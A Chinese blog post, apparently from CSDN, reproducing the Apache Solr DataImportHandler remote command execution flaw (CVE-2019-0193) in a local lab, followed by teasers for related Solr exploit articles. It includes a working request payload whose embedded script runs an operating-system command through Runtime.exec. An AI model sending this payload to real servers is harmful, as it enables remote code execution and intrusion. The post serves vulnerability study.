CVE-2019-0193漏洞复现:Apache Solr 远程命令执行漏洞复现

最新推荐文章于 2024-11-16 16:07:34 发布
最新推荐文章于 2024-11-16 16:07:34 发布
阅读量1.5k 收藏
点赞数
文章标签: solr apache 搜索引擎
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58687645/article/details/122102243
版权

0X00漏洞简介

CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞

0X01漏洞原因

Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档

  在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制

0X02漏洞影响范围

影响范围: Apache solr < 8.2.0

0X03漏洞环境搭建

下载地址Apache Download MirrorsHome page of The Apache Software Foundationhttps://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

解压完成后使用cmd进入bin文件夹执行solr –e dih

访问系统提示的界面http://localhost:8983/solr即可访问

 

0X04漏洞利用

cmd 命令执行curl http://localhost:8983/solr/admin/cores (或者浏览器访问)可以获取core信息

 

 根据获取的core信息中name信息构造payload下面的 <your_core_name> 需要替换为你获取到的 core 的 name(共两处)并将host改成你的目标机ip

payload:

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>x

 结果如下:

 

安全菜
关注
[ vulhub漏洞复现篇 ] solr 远程命令执行CVE-2019-0193
qq_51577576的博客
12-08 701
[ vulhub漏洞复现篇 ] solr 远程命令执行CVE-2019-0193) 此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 873
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr远程代码执行漏洞CVE-2019-0193复现操作
weixin_45983744的博客
12-11 729
QQ交流学习群:811401950 一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置...
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 563
Apache Solr 远程命令执行漏洞CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
Apache solr 远程代码执行漏洞CVE-2019-0193复现
weixin_42558965的博客
01-12 884
0x00:复现环境 靶机:CentOS7、docker、vulhub-master 攻击机:windows10 0x01:复现过程(数据包提交) 在/vulhub-master/solr/CVE-2019-0193/下启动镜像: docker-compose up -d 然后攻击机访问靶机IP:8983(默认端口号) 如图访问成功: 随后运行命令: docker-compose exec solr bash bin/solr create_core -c test -d example/example-
CVE-2019-0193Apache Solr远程命令执行漏洞复现
nex1less的博客
11-26 840
0x01 漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 0x02 漏洞环境 1.服务器需要安装java环境: https://jingyan.baidu.com/article/375c8e190c1f9525f2a22931.html 2.服务器需要安装curl环境: (1)下载curl包:https...
漏洞复现Apache Solr 远程命令执行漏洞CVE-2019-0193
Pluto.的博客
12-27 4288
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshell Vulhub漏洞复现 Apache Solr远程命令执行漏洞复现(CVE-2019-0193) 一、漏洞概述 Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 中索引库用 core
Vulhub漏洞复现---solr---CVE-2019-17558
最新发布
weixin_74942037的博客
11-16 1073
Velocity模板可以通过configset ’ Velocity / '目录中的Velocity模板或作为参数提供。用户定义的configset可以包含可呈现的、潜在的恶意模板。参数提供的模板在默认情况下是禁用的,但是可以通过设置params.resource.loader来启用。定义响应编写器需要配置API访问。Solr 8.4完全删除了params资源加载器,只有在configset是“可信的”(由经过身份验证的用户上传)时才启用configset提供的模板呈现。配置未打开,无法使用自定义模板。
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
HEAVEN569的博客
06-21 1408
Apache Solr 远程命令执行漏洞CVE-2017-12629)复现
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193
网络安全领域___专研者.
05-12 1272
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
Apache Solr远程代码执行漏洞CVE-2019-0193
玄道的网安博客
06-25 1118
前言 Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞CVE-2019-0193),攻击者可利用dataConfig参数构造恶意请求,导致执行任意代码 影响版本 Apache Solr < 8.2.0 环境搭建 切换到solr目录 cd vulhub/solr/CVE-2019-0193 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
午夜安全
11-24 1630
Apache Solr 远程命令执行漏洞(CVE-2019-0193) 声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径! 1.漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含...
CVE-2019-0193Apache Solr 远程命令执行漏洞复现
qq_43398810的博客
11-07 619
本文学习参考连接:https://www.cnblogs.com/paperpen/p/11328728.html 背景: 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重 范围:Apache Solr < 8.2.0 环境:https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2...
SolrCVE-2019-0193复现
weixin_30855099的博客
08-26 1095
漏洞原理:当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含脚本,因此,会存在远程代码执行漏洞 漏洞版本:Apache Solr<8.2.0 复现过程: 这里以solr 7.2.2版本为例:https://www.apache.org/dyn/closer.lua/lucene/solr...
执行带out参数的存过_Apache Solr远程代码执行漏洞CVE-2019-0193复现操作
weixin_39998906的博客
11-12 124
QQ交流学习群:811401950一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于...
Solr远程命令执行复现cve-2019-0193)
偷一个月亮
11-23 276
环境搭建 启动环境并创建集合 docker-compose up -d docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db 环境搭建完成 漏洞利用 查看模块名称 构造包开启params.resource.loader.enabled POST /solr...
Apache Solr CVE-2019-0193 环境搭建漏洞复现
星空下de青铜
05-27 402
docker pull scxiaotan2/apache-solr:cve-2019-0193 # 拉取镜像 docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash #启动shell ./start.sh #启动根目录下的服务 netstat -tlnp #可以看到1983端口启用了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值